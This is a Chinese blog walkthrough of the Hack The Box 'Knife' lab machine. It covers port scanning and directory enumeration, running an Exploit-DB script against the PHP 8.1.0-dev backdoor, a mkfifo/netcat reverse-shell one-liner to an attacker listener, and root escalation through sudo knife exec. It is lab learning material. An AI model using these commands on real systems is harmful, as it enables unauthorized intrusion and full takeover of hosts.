Lluna's Pure land.

What is life like when singing to wine?

0%

HTB-knife

发表于 更新于 分类于 阅读次数: Valine:
本文字数: 5.8k 阅读时长 ≈ 5 分钟

0x00.简述

0x01.信息收集

只开放了22、80端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root💀kali)-[~/htb/knife]
└─# nmap -sC -sV -sT 10.10.10.242 -oN nmap.CVT
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-29 02:30 EDT
Nmap scan report for 10.10.10.242
Host is up (0.42s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.03 seconds

0x02.访问80端口

手动爬虫一波啥也没有发现

0x03.列一波目录

也是什么也没有

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root💀kali)-[~]
└─# gobuster dir -u http://10.10.10.242 -w /usr/share/wordlists/dirb/common.txt                                                                                 1 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.242
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/07/29 02:50:15 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/index.php            (Status: 200) [Size: 5815]
/server-status        (Status: 403) [Size: 277]

===============================================================
2021/07/29 02:53:11 Finished
===============================================================

0x04.web指纹搜集

发现PHP/8.1.0-dev,最近刚爆出一个漏洞详情参考

1
2
3
┌──(root💀kali)-[~/htb/knife]
└─# whatweb http://10.10.10.242/                                                                                                                              130 ⨯
http://10.10.10.242/ [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.10.242], PHP[8.1.0-dev], Script, Title[Emergent Medical Idea], X-Powered-By[PHP/8.1.0-dev]

0x05.exploit-db搜索

0x06.下载利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
wget https://www.exploit-db.com/raw/49933
mv 49933 php8.1.0.rce.py
┌──(root💀kali)-[~/htb/knife]
└─# python3 php8.1.0.rce.py
Enter the full host url:
http://10.10.10.242

Interactive shell is opened on http://10.10.10.242
Can't acces tty; job crontol turned off.
$ whoami
james

$ pwd
/

$ cat /home/james/user.txt
**********************

$

0x07.提权

01.反弹shell

这个shell太难看,反弹个shell回来,kali先监听

1
2
3
4
┌──(root💀kali)-[~]
└─# nc -nvlp 6666
listening on [any] 6666 ...

目标主机执行

1
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your_ip your_port >/tmp/f

返回shell

1
2
3
4
5
6
7
8
9
┌──(root💀kali)-[~]
└─# nc -nvlp 6666                                                                                                                                               1 ⨯
listening on [any] 6666 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.10.242] 34644
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(james) gid=1000(james) groups=1000(james)
$

02.sudo -l提权

sudo -l发现knife命令(点题了。。🏴🏴🏴🏴🏴🏴)

1
2
3
4
5
6
7
8
$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
$

直接敲knife就可以看到他的参数与info,太多了,就列出exec模块

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
$ knife
ERROR: You need to pass a sub-command (e.g., knife SUB-COMMAND)

Usage: knife sub-command (options)
    -s, --server-url URL             Chef Infra Server URL.
        --chef-zero-host HOST        Host to start Chef Infra Zero on.
        --chef-zero-port PORT        Port (or port range) to start Chef Infra Zero on. Port ranges like 1000,1010 or 8889-9999 will try all given ports until one works.
    -k, --key KEY                    Chef Infra Server API client key.
        --[no-]color                 Use colored output, defaults to enabled.
    -c, --config CONFIG              The configuration file to use.
        --config-option OPTION=VALUE Override a single configuration option.
        --defaults                   Accept default values for all questions.
    -d, --disable-editing            Do not open EDITOR, just accept the data as is.
    -e, --editor EDITOR              Set the editor to use for interactive commands.
    -E, --environment ENVIRONMENT    Set the Chef Infra Client environment (except for in searches, where this will be flagrantly ignored).
        --[no-]fips                  Enable FIPS mode.
    -F, --format FORMAT              Which format to use for output. (valid options: 'summary', 'text', 'json', 'yaml', or 'pp')
        --[no-]listen                Whether a local mode (-z) server binds to a port.
    -z, --local-mode                 Point knife commands at local repository instead of Chef Infra Server.
    -u, --user USER                  Chef Infra Server API client username.
        --print-after                Show the data after a destructive operation.
        --profile PROFILE            The credentials profile to select.
    -V, --verbose                    More verbose output. Use twice (-VV) for additional verbosity and three times (-VVV) for maximum verbosity.
    -v, --version                    Show Chef Infra Client version.
    -y, --yes                        Say yes to all prompts for confirmation.
    -h, --help                       Show this help message.

Available subcommands: (for details, knife SUB-COMMAND --help)

************

** EXEC COMMANDS **
knife exec [SCRIPT] (options)

** GOOGLE COMMANDS **
knife google disk create NAME --gce-disk-size N (options)
knife google disk delete NAME [NAME] (options)
knife google disk list
knife google image list
knife google project quotas
knife google region list
knife google region quotas
knife google server create NAME -m MACHINE_TYPE -I IMAGE (options)
knife google server delete INSTANCE_NAME [INSTANCE_NAME] (options)
knife google server list
knife google server show INSTANCE_NAME (options)
knife google zone list

***************************************
** YAML COMMANDS **
knife yaml convert YAML_FILENAME [RUBY_FILENAME]

$

knife参考

提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ sudo knife exec --exec "exec '/bin/bash -i'"
bash: cannot set terminal process group (967): Inappropriate ioctl for device
bash: no job control in this shell
root@knife:/home/james#
root@knife:/home/james# cd
cd
root@knife:~# ls
ls
delete.sh
root.txt
snap
root@knife:~# cat root.txt
cat root.txt
***************************
root@knife:~#

-------------纸短情长下次再见-------------